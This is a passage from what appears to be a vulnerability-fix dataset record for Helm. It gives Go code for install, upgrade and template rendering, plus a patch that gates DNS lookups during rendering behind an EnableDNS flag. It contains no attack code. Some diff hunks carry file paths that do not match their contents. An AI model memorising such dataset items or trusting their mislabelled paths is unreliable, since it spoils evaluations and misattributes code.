*i.KubeVersion\n\t\t}\n\t\ti.cfg.Capabilities.APIVersions = append(i.cfg.Capabilities.APIVersions, i.APIVersions...)\n\t\ti.cfg.KubeClient = &kubefake.PrintingKubeClient{Out: ioutil.Discard}\n\n\t\tmem := driver.NewMemory()\n\t\tmem.SetNamespace(i.Namespace)\n\t\ti.cfg.Releases = storage.Init(mem)\n\t} else if !i.ClientOnly && len(i.APIVersions) > 0 {\n\t\ti.cfg.Log(\"API Version list given outside of client only mode, this list will be ignored\")\n\t}\n\n\t// Make sure if Atomic is set, that wait is set as well. This makes it so\n\t// the user doesn't have to specify both\n\ti.Wait = i.Wait || i.Atomic\n\n\tcaps, err := i.cfg.getCapabilities()\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// special case for helm template --is-upgrade\n\tisUpgrade := i.IsUpgrade && i.DryRun\n\toptions := chartutil.ReleaseOptions{\n\t\tName: i.ReleaseName,\n\t\tNamespace: i.Namespace,\n\t\tRevision: 1,\n\t\tIsInstall: !isUpgrade,\n\t\tIsUpgrade: isUpgrade,\n\t}\n\tvaluesToRender, err := chartutil.ToRenderValues(chrt, vals, options, caps)\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\trel := i.createRelease(chrt, vals)\n\n\tvar manifestDoc *bytes.Buffer\n\trel.Hooks, manifestDoc, rel.Info.Notes, err = i.cfg.renderResources(chrt, valuesToRender, i.ReleaseName, i.OutputDir, i.SubNotes, i.UseReleaseName, i.IncludeCRDs, i.PostRenderer, i.DryRun, i.EnableDNS)\n\t// Even for errors, attach this if available\n\tif manifestDoc != nil {\n\t\trel.Manifest = manifestDoc.String()\n\t}\n\t// Check error from render\n\tif err != nil {\n\t\trel.SetStatus(release.StatusFailed, fmt.Sprintf(\"failed to render resource: %s\", err.Error()))\n\t\t// Return a release with partial data so that the client can show debugging information.\n\t\treturn rel, err\n\t}\n\n\t// Mark this release as in-progress\n\trel.SetStatus(release.StatusPendingInstall, \"Initial install underway\")\n\n\tvar toBeAdopted kube.ResourceList\n\tresources, err := i.cfg.KubeClient.Build(bytes.NewBufferString(rel.Manifest), !i.DisableOpenAPIValidation)\n\tif err != nil {\n\t\treturn nil, errors.Wrap(err, \"unable to build kubernetes objects from release manifest\")\n\t}\n\n\t// It is safe to use \"force\" here because these are resources currently rendered by the chart.\n\terr = resources.Visit(setMetadataVisitor(rel.Name, rel.Namespace, true))\n\tif err != nil {\n\t\treturn nil, err\n\t}\n\n\t// Install requires an extra validation step of checking that resources\n\t// don't already exist before we actually create resources. If we continue\n\t// forward and create the release object with resources that already exist,\n\t// we'll end up in a state where we will delete those resources upon\n\t// deleting the release because the manifest will be pointing at that\n\t// resource\n\tif !i.ClientOnly && !isUpgrade && len(resources) > 0 {\n\t\ttoBeAdopted, err = existingResourceConflict(resources, rel.Name, rel.Namespace)\n\t\tif err != nil {\n\t\t\treturn nil, errors.Wrap(err, \"rendered manifests contain a resource that already exists. Unable to continue with install\")\n\t\t}\n\t}\n\n\t// Bail out here if it is a dry run\n\tif i.DryRun {\n\t\trel.Info.Description = \"Dry run complete\"\n\t\treturn rel, nil\n\t}\n\n\tif i.CreateNamespace {\n\t\tns := &v1.Namespace{\n\t\t\tTypeMeta: metav1.TypeMeta{\n\t\t\t\tAPIVersion: \"v1\",\n\t\t\t\tKind: \"Namespace\",\n\t\t\t},\n\t\t\tObjectMeta: metav1.ObjectMeta{\n\t\t\t\tName: i.Namespace,\n\t\t\t\tLabels: map[string]string{\n\t\t\t\t\t\"name\": i.Namespace,\n\t\t\t\t},\n\t\t\t},\n\t\t}\n\t\tbuf, err := yaml.Marshal(ns)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tresourceList, err := i.cfg.KubeClient.Build(bytes.NewBuffer(buf), true)\n\t\tif err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t\tif _, err := i.cfg.KubeClient.Create(resourceList); err != nil && !apierrors.IsAlreadyExists(err) {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\t// If Replace is true, we need to supercede the last release.\n\tif i.Replace {\n\t\tif err := i.replaceRelease(rel); err != nil {\n\t\t\treturn nil, err\n\t\t}\n\t}\n\n\t// Store the release in history before continuing (new in Helm 3). We always know\n\t// that this is a create operation.\n\tif err := i.cfg.Releases.Create(rel); err != nil {\n\t\t// We could try to recover gracefully here, but since nothing has been installed\n\t\t// yet, this is probably safer than trying to continue when we know storage is\n\t\t// not working.\n\t\treturn rel, err\n\t}\n\trChan := make(chan resultMessage)\n\tdoneChan := make(chan struct{})\n\tdefer close(doneChan)\n\tgo i.performInstall(rChan, rel, toBeAdopted, resources)\n\tgo i.handleContext(ctx, rChan, doneChan, rel)\n\tresult := <-rChan\n\t//start preformInstall go routine\n\treturn result.r, result.e\n}"}, {"id": "fix_go_49_7", "commit": "5abcf74227bfe8e5a3dbf105fe62e7b12deb58d2", "file_path": "pkg/action/action.go", "start_line": 106, "end_line": 231, "snippet": "func (cfg *Configuration) renderResources(ch *chart.Chart, values chartutil.Values, releaseName, outputDir string, subNotes, useReleaseName, includeCrds bool, pr postrender.PostRenderer, dryRun, enableDNS bool) ([]*release.Hook, *bytes.Buffer, string, error) {\n\ths := []*release.Hook{}\n\tb := bytes.NewBuffer(nil)\n\n\tcaps, err := cfg.getCapabilities()\n\tif err != nil {\n\t\treturn hs, b, \"\", err\n\t}\n\n\tif ch.Metadata.KubeVersion != \"\" {\n\t\tif !chartutil.IsCompatibleRange(ch.Metadata.KubeVersion, caps.KubeVersion.String()) {\n\t\t\treturn hs, b, \"\", errors.Errorf(\"chart requires kubeVersion: %s which is incompatible with Kubernetes %s\", ch.Metadata.KubeVersion, caps.KubeVersion.String())\n\t\t}\n\t}\n\n\tvar files map[string]string\n\tvar err2 error\n\n\t// A `helm template` or `helm install --dry-run` should not talk to the remote cluster.\n\t// It will break in interesting and exotic ways because other data (e.g. discovery)\n\t// is mocked. It is not up to the template author to decide when the user wants to\n\t// connect to the cluster. So when the user says to dry run, respect the user's\n\t// wishes and do not connect to the cluster.\n\tif !dryRun && cfg.RESTClientGetter != nil {\n\t\trestConfig, err := cfg.RESTClientGetter.ToRESTConfig()\n\t\tif err != nil {\n\t\t\treturn hs, b, \"\", err\n\t\t}\n\t\te := engine.New(restConfig)\n\t\te.EnableDNS = enableDNS\n\t\tfiles, err2 = e.Render(ch, values)\n\t} else {\n\t\tvar e engine.Engine\n\t\te.EnableDNS = enableDNS\n\t\tfiles, err2 = e.Render(ch, values)\n\t}\n\n\tif err2 != nil {\n\t\treturn hs, b, \"\", err2\n\t}\n\n\t// NOTES.txt gets rendered like all the other files, but because it's not a hook nor a resource,\n\t// pull it out of here into a separate file so that we can actually use the output of the rendered\n\t// text file. We have to spin through this map because the file contains path information, so we\n\t// look for terminating NOTES.txt. We also remove it from the files so that we don't have to skip\n\t// it in the sortHooks.\n\tvar notesBuffer bytes.Buffer\n\tfor k, v := range files {\n\t\tif strings.HasSuffix(k, notesFileSuffix) {\n\t\t\tif subNotes || (k == path.Join(ch.Name(), \"templates\", notesFileSuffix)) {\n\t\t\t\t// If buffer contains data, add newline before adding more\n\t\t\t\tif notesBuffer.Len() > 0 {\n\t\t\t\t\tnotesBuffer.WriteString(\"\\n\")\n\t\t\t\t}\n\t\t\t\tnotesBuffer.WriteString(v)\n\t\t\t}\n\t\t\tdelete(files, k)\n\t\t}\n\t}\n\tnotes := notesBuffer.String()\n\n\t// Sort hooks, manifests, and partials. Only hooks and manifests are returned,\n\t// as partials are not used after renderer.Render. Empty manifests are also\n\t// removed here.\n\ths, manifests, err := releaseutil.SortManifests(files, caps.APIVersions, releaseutil.InstallOrder)\n\tif err != nil {\n\t\t// By catching parse errors here, we can prevent bogus releases from going\n\t\t// to Kubernetes.\n\t\t//\n\t\t// We return the files as a big blob of data to help the user debug parser\n\t\t// errors.\n\t\tfor name, content := range files {\n\t\t\tif strings.TrimSpace(content) == \"\" {\n\t\t\t\tcontinue\n\t\t\t}\n\t\t\tfmt.Fprintf(b, \"---\\n# Source: %s\\n%s\\n\", name, content)\n\t\t}\n\t\treturn hs, b, \"\", err\n\t}\n\n\t// Aggregate all valid manifests into one big doc.\n\tfileWritten := make(map[string]bool)\n\n\tif includeCrds {\n\t\tfor _, crd := range ch.CRDObjects() {\n\t\t\tif outputDir == \"\" {\n\t\t\t\tfmt.Fprintf(b, \"---\\n# Source: %s\\n%s\\n\", crd.Name, string(crd.File.Data[:]))\n\t\t\t} else {\n\t\t\t\terr = writeToFile(outputDir, crd.Filename, string(crd.File.Data[:]), fileWritten[crd.Name])\n\t\t\t\tif err != nil {\n\t\t\t\t\treturn hs, b, \"\", err\n\t\t\t\t}\n\t\t\t\tfileWritten[crd.Name] = true\n\t\t\t}\n\t\t}\n\t}\n\n\tfor _, m := range manifests {\n\t\tif outputDir == \"\" {\n\t\t\tfmt.Fprintf(b, \"---\\n# Source: %s\\n%s\\n\", m.Name, m.Content)\n\t\t} else {\n\t\t\tnewDir := outputDir\n\t\t\tif useReleaseName {\n\t\t\t\tnewDir = filepath.Join(outputDir, releaseName)\n\t\t\t}\n\t\t\t// NOTE: We do not have to worry about the post-renderer because\n\t\t\t// output dir is only used by `helm template`. In the next major\n\t\t\t// release, we should move this logic to template only as it is not\n\t\t\t// used by install or upgrade\n\t\t\terr = writeToFile(newDir, m.Name, m.Content, fileWritten[m.Name])\n\t\t\tif err != nil {\n\t\t\t\treturn hs, b, \"\", err\n\t\t\t}\n\t\t\tfileWritten[m.Name] = true\n\t\t}\n\t}\n\n\tif pr != nil {\n\t\tb, err = pr.Run(b)\n\t\tif err != nil {\n\t\t\treturn hs, b, notes, errors.Wrap(err, \"error while running post render on files\")\n\t\t}\n\t}\n\n\treturn hs, b, notes, nil\n}"}, {"id": "fix_go_49_8", "commit": "5abcf74227bfe8e5a3dbf105fe62e7b12deb58d2", "file_path": "cmd/helm/upgrade.go", "start_line": 70, "end_line": 254, "snippet": "func newUpgradeCmd(cfg *action.Configuration, out io.Writer) *cobra.Command {\n\tclient := action.NewUpgrade(cfg)\n\tvalueOpts := &values.Options{}\n\tvar outfmt output.Format\n\tvar createNamespace bool\n\n\tcmd := &cobra.Command{\n\t\tUse: \"upgrade [RELEASE] [CHART]\",\n\t\tShort: \"upgrade a release\",\n\t\tLong: upgradeDesc,\n\t\tArgs: require.ExactArgs(2),\n\t\tValidArgsFunction: func(cmd *cobra.Command, args []string, toComplete string) ([]string, cobra.ShellCompDirective) {\n\t\t\tif len(args) == 0 {\n\t\t\t\treturn compListReleases(toComplete, args, cfg)\n\t\t\t}\n\t\t\tif len(args) == 1 {\n\t\t\t\treturn compListCharts(toComplete, true)\n\t\t\t}\n\t\t\treturn nil, cobra.ShellCompDirectiveNoFileComp\n\t\t},\n\t\tRunE: func(cmd *cobra.Command, args []string) error {\n\t\t\tclient.Namespace = settings.Namespace()\n\n\t\t\t// Fixes #7002 - Support reading values from STDIN for `upgrade` command\n\t\t\t// Must load values AFTER determining if we have to call install so that values loaded from stdin are are not read twice\n\t\t\tif client.Install {\n\t\t\t\t// If a release does not exist, install it.\n\t\t\t\thistClient := action.NewHistory(cfg)\n\t\t\t\thistClient.Max = 1\n\t\t\t\tif _, err := histClient.Run(args[0]); err == driver.ErrReleaseNotFound {\n\t\t\t\t\t// Only print this to stdout for table output\n\t\t\t\t\tif outfmt == output.Table {\n\t\t\t\t\t\tfmt.Fprintf(out, \"Release %q does not exist. Installing it now.\\n\", args[0])\n\t\t\t\t\t}\n\t\t\t\t\tinstClient := action.NewInstall(cfg)\n\t\t\t\t\tinstClient.CreateNamespace = createNamespace\n\t\t\t\t\tinstClient.ChartPathOptions = client.ChartPathOptions\n\t\t\t\t\tinstClient.Force = client.Force\n\t\t\t\t\tinstClient.DryRun = client.DryRun\n\t\t\t\t\tinstClient.DisableHooks = client.DisableHooks\n\t\t\t\t\tinstClient.SkipCRDs = client.SkipCRDs\n\t\t\t\t\tinstClient.Timeout = client.Timeout\n\t\t\t\t\tinstClient.Wait = client.Wait\n\t\t\t\t\tinstClient.WaitForJobs = client.WaitForJobs\n\t\t\t\t\tinstClient.Devel = client.Devel\n\t\t\t\t\tinstClient.Namespace = client.Namespace\n\t\t\t\t\tinstClient.Atomic = client.Atomic\n\t\t\t\t\tinstClient.PostRenderer = client.PostRenderer\n\t\t\t\t\tinstClient.DisableOpenAPIValidation = client.DisableOpenAPIValidation\n\t\t\t\t\tinstClient.SubNotes = client.SubNotes\n\t\t\t\t\tinstClient.Description = client.Description\n\t\t\t\t\tinstClient.DependencyUpdate = client.DependencyUpdate\n\t\t\t\t\tinstClient.EnableDNS = client.EnableDNS\n\n\t\t\t\t\trel, err := runInstall(args, instClient, valueOpts, out)\n\t\t\t\t\tif err != nil {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t\treturn outfmt.Write(out, &statusPrinter{rel, settings.Debug, false, false})\n\t\t\t\t} else if err != nil {\n\t\t\t\t\treturn err\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tif client.Version == \"\" && client.Devel {\n\t\t\t\tdebug(\"setting version to >0.0.0-0\")\n\t\t\t\tclient.Version = \">0.0.0-0\"\n\t\t\t}\n\n\t\t\tchartPath, err := client.ChartPathOptions.LocateChart(args[1], settings)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\tp := getter.All(settings)\n\t\t\tvals, err := valueOpts.MergeValues(p)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\n\t\t\t// Check chart dependencies to make sure all are present in /charts\n\t\t\tch, err := loader.Load(chartPath)\n\t\t\tif err != nil {\n\t\t\t\treturn err\n\t\t\t}\n\t\t\tif req := ch.Metadata.Dependencies; req != nil {\n\t\t\t\tif err := action.CheckDependencies(ch, req); err != nil {\n\t\t\t\t\terr = errors.Wrap(err, \"An error occurred while checking for chart dependencies. You may need to run `helm dependency build` to fetch missing dependencies\")\n\t\t\t\t\tif client.DependencyUpdate {\n\t\t\t\t\t\tman := &downloader.Manager{\n\t\t\t\t\t\t\tOut: out,\n\t\t\t\t\t\t\tChartPath: chartPath,\n\t\t\t\t\t\t\tKeyring: client.ChartPathOptions.Keyring,\n\t\t\t\t\t\t\tSkipUpdate: false,\n\t\t\t\t\t\t\tGetters: p,\n\t\t\t\t\t\t\tRepositoryConfig: settings.RepositoryConfig,\n\t\t\t\t\t\t\tRepositoryCache: settings.RepositoryCache,\n\t\t\t\t\t\t\tDebug: settings.Debug,\n\t\t\t\t\t\t}\n\t\t\t\t\t\tif err := man.Update(); err != nil {\n\t\t\t\t\t\t\treturn err\n\t\t\t\t\t\t}\n\t\t\t\t\t\t// Reload the chart with the updated Chart.lock file.\n\t\t\t\t\t\tif ch, err = loader.Load(chartPath); err != nil {\n\t\t\t\t\t\t\treturn errors.Wrap(err, \"failed reloading chart after repo update\")\n\t\t\t\t\t\t}\n\t\t\t\t\t} else {\n\t\t\t\t\t\treturn err\n\t\t\t\t\t}\n\t\t\t\t}\n\t\t\t}\n\n\t\t\tif ch.Metadata.Deprecated {\n\t\t\t\twarning(\"This chart is deprecated\")\n\t\t\t}\n\n\t\t\t// Create context and prepare the handle of SIGTERM\n\t\t\tctx := context.Background()\n\t\t\tctx, cancel := context.WithCancel(ctx)\n\n\t\t\t// Set up channel on which to send signal notifications.\n\t\t\t// We must use a buffered channel or risk missing the signal\n\t\t\t// if we're not ready to receive when the signal is sent.\n\t\t\tcSignal := make(chan os.Signal, 2)\n\t\t\tsignal.Notify(cSignal, os.Interrupt, syscall.SIGTERM)\n\t\t\tgo func() {\n\t\t\t\t<-cSignal\n\t\t\t\tfmt.Fprintf(out, \"Release %s has been cancelled.\\n\", args[0])\n\t\t\t\tcancel()\n\t\t\t}()\n\n\t\t\trel, err := client.RunWithContext(ctx, args[0], ch, vals)\n\t\t\tif err != nil {\n\t\t\t\treturn errors.Wrap(err, \"UPGRADE FAILED\")\n\t\t\t}\n\n\t\t\tif outfmt == output.Table {\n\t\t\t\tfmt.Fprintf(out, \"Release %q has been upgraded. Happy Helming!\\n\", args[0])\n\t\t\t}\n\n\t\t\treturn outfmt.Write(out, &statusPrinter{rel, settings.Debug, false, false})\n\t\t},\n\t}\n\n\tf := cmd.Flags()\n\tf.BoolVar(&createNamespace, \"create-namespace\", false, \"if --install is set, create the release namespace if not present\")\n\tf.BoolVarP(&client.Install, \"install\", \"i\", false, \"if a release by this name doesn't already exist, run an install\")\n\tf.BoolVar(&client.Devel, \"devel\", false, \"use development versions, too. Equivalent to version '>0.0.0-0'. If --version is set, this is ignored\")\n\tf.BoolVar(&client.DryRun, \"dry-run\", false, \"simulate an upgrade\")\n\tf.BoolVar(&client.Recreate, \"recreate-pods\", false, \"performs pods restart for the resource if applicable\")\n\tf.MarkDeprecated(\"recreate-pods\", \"functionality will no longer be updated. Consult the documentation for other methods to recreate pods\")\n\tf.BoolVar(&client.Force, \"force\", false, \"force resource updates through a replacement strategy\")\n\tf.BoolVar(&client.DisableHooks, \"no-hooks\", false, \"disable pre/post upgrade hooks\")\n\tf.BoolVar(&client.DisableOpenAPIValidation, \"disable-openapi-validation\", false, \"if set, the upgrade process will not validate rendered templates against the Kubernetes OpenAPI Schema\")\n\tf.BoolVar(&client.SkipCRDs, \"skip-crds\", false, \"if set, no CRDs will be installed when an upgrade is performed with install flag enabled. By default, CRDs are installed if not already present, when an upgrade is performed with install flag enabled\")\n\tf.DurationVar(&client.Timeout, \"timeout\", 300*time.Second, \"time to wait for any individual Kubernetes operation (like Jobs for hooks)\")\n\tf.BoolVar(&client.ResetValues, \"reset-values\", false, \"when upgrading, reset the values to the ones built into the chart\")\n\tf.BoolVar(&client.ReuseValues, \"reuse-values\", false, \"when upgrading, reuse the last release's values and merge in any overrides from the command line via --set and -f. If '--reset-values' is specified, this is ignored\")\n\tf.BoolVar(&client.Wait, \"wait\", false, \"if set, will wait until all Pods, PVCs, Services, and minimum number of Pods of a Deployment, StatefulSet, or ReplicaSet are in a ready state before marking the release as successful. It will wait for as long as --timeout\")\n\tf.BoolVar(&client.WaitForJobs, \"wait-for-jobs\", false, \"if set and --wait enabled, will wait until all Jobs have been completed before marking the release as successful. It will wait for as long as --timeout\")\n\tf.BoolVar(&client.Atomic, \"atomic\", false, \"if set, upgrade process rolls back changes made in case of failed upgrade. The --wait flag will be set automatically if --atomic is used\")\n\tf.IntVar(&client.MaxHistory, \"history-max\", settings.MaxHistory, \"limit the maximum number of revisions saved per release. Use 0 for no limit\")\n\tf.BoolVar(&client.CleanupOnFail, \"cleanup-on-fail\", false, \"allow deletion of new resources created in this upgrade when upgrade fails\")\n\tf.BoolVar(&client.SubNotes, \"render-subchart-notes\", false, \"if set, render subchart notes along with the parent\")\n\tf.StringVar(&client.Description, \"description\", \"\", \"add a custom description\")\n\tf.BoolVar(&client.DependencyUpdate, \"dependency-update\", false, \"update dependencies if they are missing before installing the chart\")\n\tf.BoolVar(&client.EnableDNS, \"enable-dns\", false, \"enable DNS lookups when rendering templates\")\n\taddChartPathOptionsFlags(f, &client.ChartPathOptions)\n\taddValueOptionsFlags(f, valueOpts)\n\tbindOutputFlag(cmd, &outfmt)\n\tbindPostRenderFlag(cmd, &client.PostRenderer)\n\n\terr := cmd.RegisterFlagCompletionFunc(\"version\", func(cmd *cobra.Command, args []string, toComplete string) ([]string, cobra.ShellCompDirective) {\n\t\tif len(args) != 2 {\n\t\t\treturn nil, cobra.ShellCompDirectiveNoFileComp\n\t\t}\n\t\treturn compVersionFlag(args[1], toComplete)\n\t})\n\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n\n\treturn cmd\n}"}, {"id": "fix_go_49_9", "commit": "5abcf74227bfe8e5a3dbf105fe62e7b12deb58d2", "file_path": "cmd/helm/install.go", "start_line": 155, "end_line": 191, "snippet": "func addInstallFlags(cmd *cobra.Command, f *pflag.FlagSet, client *action.Install, valueOpts *values.Options) {\n\tf.BoolVar(&client.CreateNamespace, \"create-namespace\", false, \"create the release namespace if not present\")\n\tf.BoolVar(&client.DryRun, \"dry-run\", false, \"simulate an install\")\n\tf.BoolVar(&client.Force, \"force\", false, \"force resource updates through a replacement strategy\")\n\tf.BoolVar(&client.DisableHooks, \"no-hooks\", false, \"prevent hooks from running during install\")\n\tf.BoolVar(&client.Replace, \"replace\", false, \"re-use the given name, only if that name is a deleted release which remains in the history. This is unsafe in production\")\n\tf.DurationVar(&client.Timeout, \"timeout\", 300*time.Second, \"time to wait for any individual Kubernetes operation (like Jobs for hooks)\")\n\tf.BoolVar(&client.Wait, \"wait\", false, \"if set, will wait until all Pods, PVCs, Services, and minimum number of Pods of a Deployment, StatefulSet, or ReplicaSet are in a ready state before marking the release as successful. It will wait for as long as --timeout\")\n\tf.BoolVar(&client.WaitForJobs, \"wait-for-jobs\", false, \"if set and --wait enabled, will wait until all Jobs have been completed before marking the release as successful. It will wait for as long as --timeout\")\n\tf.BoolVarP(&client.GenerateName, \"generate-name\", \"g\", false, \"generate the name (and omit the NAME parameter)\")\n\tf.StringVar(&client.NameTemplate, \"name-template\", \"\", \"specify template used to name the release\")\n\tf.StringVar(&client.Description, \"description\", \"\", \"add a custom description\")\n\tf.BoolVar(&client.Devel, \"devel\", false, \"use development versions, too. Equivalent to version '>0.0.0-0'. If --version is set, this is ignored\")\n\tf.BoolVar(&client.DependencyUpdate, \"dependency-update\", false, \"update dependencies if they are missing before installing the chart\")\n\tf.BoolVar(&client.DisableOpenAPIValidation, \"disable-openapi-validation\", false, \"if set, the installation process will not validate rendered templates against the Kubernetes OpenAPI Schema\")\n\tf.BoolVar(&client.Atomic, \"atomic\", false, \"if set, the installation process deletes the installation on failure. The --wait flag will be set automatically if --atomic is used\")\n\tf.BoolVar(&client.SkipCRDs, \"skip-crds\", false, \"if set, no CRDs will be installed. By default, CRDs are installed if not already present\")\n\tf.BoolVar(&client.SubNotes, \"render-subchart-notes\", false, \"if set, render subchart notes along with the parent\")\n\tf.BoolVar(&client.EnableDNS, \"enable-dns\", false, \"enable DNS lookups when rendering templates\")\n\taddValueOptionsFlags(f, valueOpts)\n\taddChartPathOptionsFlags(f, &client.ChartPathOptions)\n\n\terr := cmd.RegisterFlagCompletionFunc(\"version\", func(cmd *cobra.Command, args []string, toComplete string) ([]string, cobra.ShellCompDirective) {\n\t\trequiredArgs := 2\n\t\tif client.GenerateName {\n\t\t\trequiredArgs = 1\n\t\t}\n\t\tif len(args) != requiredArgs {\n\t\t\treturn nil, cobra.ShellCompDirectiveNoFileComp\n\t\t}\n\t\treturn compVersionFlag(args[requiredArgs-1], toComplete)\n\t})\n\n\tif err != nil {\n\t\tlog.Fatal(err)\n\t}\n}"}], "vul_patch": "--- a/pkg/engine/engine.go\n+++ b/pkg/engine/engine.go\n@@ -6,4 +6,13 @@\n \tLintMode bool\n \t// the rest config to connect to the kubernetes api\n \tconfig *rest.Config\n+\t// EnableDNS tells the engine to allow DNS lookups when rendering templates\n+\tEnableDNS bool\n }\n+\n+// New creates a new instance of Engine using the passed in rest config.\n+func New(config *rest.Config) Engine {\n+\treturn Engine{\n+\t\tconfig: config,\n+\t}\n+}\n\n--- a/pkg/engine/engine.go\n+++ b/pkg/engine/engine.go\n@@ -83,5 +83,13 @@\n \t\tfuncMap[\"lookup\"] = NewLookupFunction(e.config)\n \t}\n \n+\t// When DNS lookups are not enabled override the sprig function and return\n+\t// an empty string.\n+\tif !e.EnableDNS {\n+\t\tfuncMap[\"getHostByName\"] = func(name string) string {\n+\t\t\treturn \"\"\n+\t\t}\n+\t}\n+\n \tt.Funcs(funcMap)\n }\n\n--- /dev/null\n+++ b/pkg/engine/engine.go\n@@ -0,0 +1,66 @@\n+type Upgrade struct {\n+\tcfg *Configuration\n+\n+\tChartPathOptions\n+\n+\t// Install is a purely informative flag that indicates whether this upgrade was done in \"install\" mode.\n+\t//\n+\t// Applications may use this to determine whether this Upgrade operation was done as part of a\n+\t// pure upgrade (Upgrade.Install == false) or as part of an install-or-upgrade operation\n+\t// (Upgrade.Install == true).\n+\t//\n+\t// Setting this to `true` will NOT cause `Upgrade` to perform an install if the release does not exist.\n+\t// That process must be handled by creating an Install action directly. See cmd/upgrade.go for an\n+\t// example of how this flag is used.\n+\tInstall bool\n+\t// Devel indicates that the operation is done in devel mode.\n+\tDevel bool\n+\t// Namespace is the namespace in which this operation should be performed.\n+\tNamespace string\n+\t// SkipCRDs skips installing CRDs when install flag is enabled during upgrade\n+\tSkipCRDs bool\n+\t// Timeout is the timeout for this operation\n+\tTimeout time.Duration\n+\t// Wait determines whether the wait operation should be performed after the upgrade is requested.\n+\tWait bool\n+\t// WaitForJobs determines whether the wait operation for the Jobs should be performed after the upgrade is requested.\n+\tWaitForJobs bool\n+\t// DisableHooks disables hook processing if set to true.\n+\tDisableHooks bool\n+\t// DryRun controls whether the operation is prepared, but not executed.\n+\t// If `true`, the upgrade is prepared but not performed.\n+\tDryRun bool\n+\t// Force will, if set to `true`, ignore certain warnings and perform the upgrade anyway.\n+\t//\n+\t// This should be used with caution.\n+\tForce bool\n+\t// ResetValues will reset the values to the chart's built-ins rather than merging with existing.\n+\tResetValues bool\n+\t// ReuseValues will re-use the user's last supplied values.\n+\tReuseValues bool\n+\t// Recreate will (if true) recreate pods after a rollback.\n+\tRecreate bool\n+\t// MaxHistory limits the maximum number of revisions saved per release\n+\tMaxHistory int\n+\t// Atomic, if true, will roll back on failure.\n+\tAtomic bool\n+\t// CleanupOnFail will, if true, cause the upgrade to delete newly-created resources on a failed update.\n+\tCleanupOnFail bool\n+\t// SubNotes determines whether sub-notes are rendered in the chart.\n+\tSubNotes bool\n+\t// Description is the description of this operation\n+\tDescription string\n+\t// PostRender is an optional post-renderer\n+\t//\n+\t// If this is non-nil, then after templates are rendered, they will be sent to the\n+\t// post renderer before sending to the Kubernetes API server.\n+\tPostRenderer postrender.PostRenderer\n+\t// DisableOpenAPIValidation controls whether OpenAPI validation is enforced.\n+\tDisableOpenAPIValidation bool\n+\t// Get missing dependencies\n+\tDependencyUpdate bool\n+\t// Lock to control raceconditions when the process receives a SIGTERM\n+\tLock sync.Mutex\n+\t// Enable DNS lookups when rendering templates\n+\tEnableDNS bool\n+}\n\n--- /dev/null\n+++ b/pkg/engine/engine.go\n@@ -0,0 +1,95 @@\n+func (u *Upgrade) prepareUpgrade(name string, chart *chart.Chart, vals map[string]interface{}) (*release.Release, *release.Release, error) {\n+\tif chart == nil {\n+\t\treturn nil, nil, errMissingChart\n+\t}\n+\n+\t// finds the last non-deleted release with the given name\n+\tlastRelease, err := u.cfg.Releases.Last(name)\n+\tif err != nil {\n+\t\t// to keep existing behavior of returning the \"%q has no deployed releases\" error when an existing release does not exist\n+\t\tif errors.Is(err, driver.ErrReleaseNotFound) {\n+\t\t\treturn nil, nil, driver.NewErrNoDeployedReleases(name)\n+\t\t}\n+\t\treturn nil, nil, err\n+\t}\n+\n+\t// Concurrent `helm upgrade`s will either fail here with `errPending` or when creating the release with \"already exists\". This should act as a pessimistic lock.\n+\tif lastRelease.Info.Status.IsPending() {\n+\t\treturn nil, nil, errPending\n+\t}\n+\n+\tvar currentRelease *release.Release\n+\tif lastRelease.Info.Status == release.StatusDeployed {\n+\t\t// no need to retrieve the last deployed release from storage as the last release is deployed\n+\t\tcurrentRelease = lastRelease\n+\t} else {\n+\t\t// finds the deployed release with the given name\n+\t\tcurrentRelease, err = u.cfg.Releases.Deployed(name)\n+\t\tif err != nil {\n+\t\t\tif errors.Is(err, driver.ErrNoDeployedReleases) &&\n+\t\t\t\t(lastRelease.Info.Status == release.StatusFailed || lastRelease.Info.Status == release.StatusSuperseded) {\n+\t\t\t\tcurrentRelease = lastRelease\n+\t\t\t} else {\n+\t\t\t\treturn nil, nil, err\n+\t\t\t}\n+\t\t}\n+\t}\n+\n+\t// determine if values will be reused\n+\tvals, err = u.reuseValues(chart, currentRelease, vals)\n+\tif err != nil {\n+\t\treturn nil, nil, err\n+\t}\n+\n+\tif err := chartutil.ProcessDependencies(chart, vals); err != nil {\n+\t\treturn nil, nil, err\n+\t}\n+\n+\t// Increment revision count. This is passed to templates, and also stored on\n+\t// the release object.\n+\trevision := lastRelease.Version + 1\n+\n+\toptions := chartutil.ReleaseOptions{\n+\t\tName: name,\n+\t\tNamespace: currentRelease.Namespace,\n+\t\tRevision: revision,\n+\t\tIsUpgrade: true,\n+\t}\n+\n+\tcaps, err := u.cfg.getCapabilities()\n+\tif err != nil {\n+\t\treturn nil, nil, err\n+\t}\n+\tvaluesToRender, err := chartutil.ToRenderValues(chart, vals, options, caps)\n+\tif err != nil {\n+\t\treturn nil, nil, err\n+\t}\n+\n+\thooks, manifestDoc, notesTxt, err := u.cfg.renderResources(chart, valuesToRender, \"\", \"\", u.SubNotes, false, false, u.PostRenderer, u.DryRun, u.EnableDNS)\n+\tif err != nil {\n+\t\treturn nil, nil, err\n+\t}\n+\n+\t// Store an upgraded release.\n+\tupgradedRelease := &release.Release{\n+\t\tName: name,\n+\t\tNamespace: currentRelease.Namespace,\n+\t\tChart: chart,\n+\t\tConfig: vals,\n+\t\tInfo: &release.Info{\n+\t\t\tFirstDeployed: currentRelease.Info.FirstDeployed,\n+\t\t\tLastDeployed: Timestamper(),\n+\t\t\tStatus: release.StatusPendingUpgrade,\n+\t\t\tDescription: \"Preparing upgrade\", // This should be overwritten later.\n+\t\t},\n+\t\tVersion: revision,\n+\t\tManifest: manifestDoc.String(),\n+\t\tHooks: hooks,\n+\t}\n+\n+\tif len(notesTxt) > 0 {\n+\t\tupgradedRelease.Info.Notes = notesTxt\n+\t}\n+\terr = validateManifest(u.cfg.KubeClient, manifestDoc.Bytes(), !u.DisableOpenAPIValidation)\n+\treturn 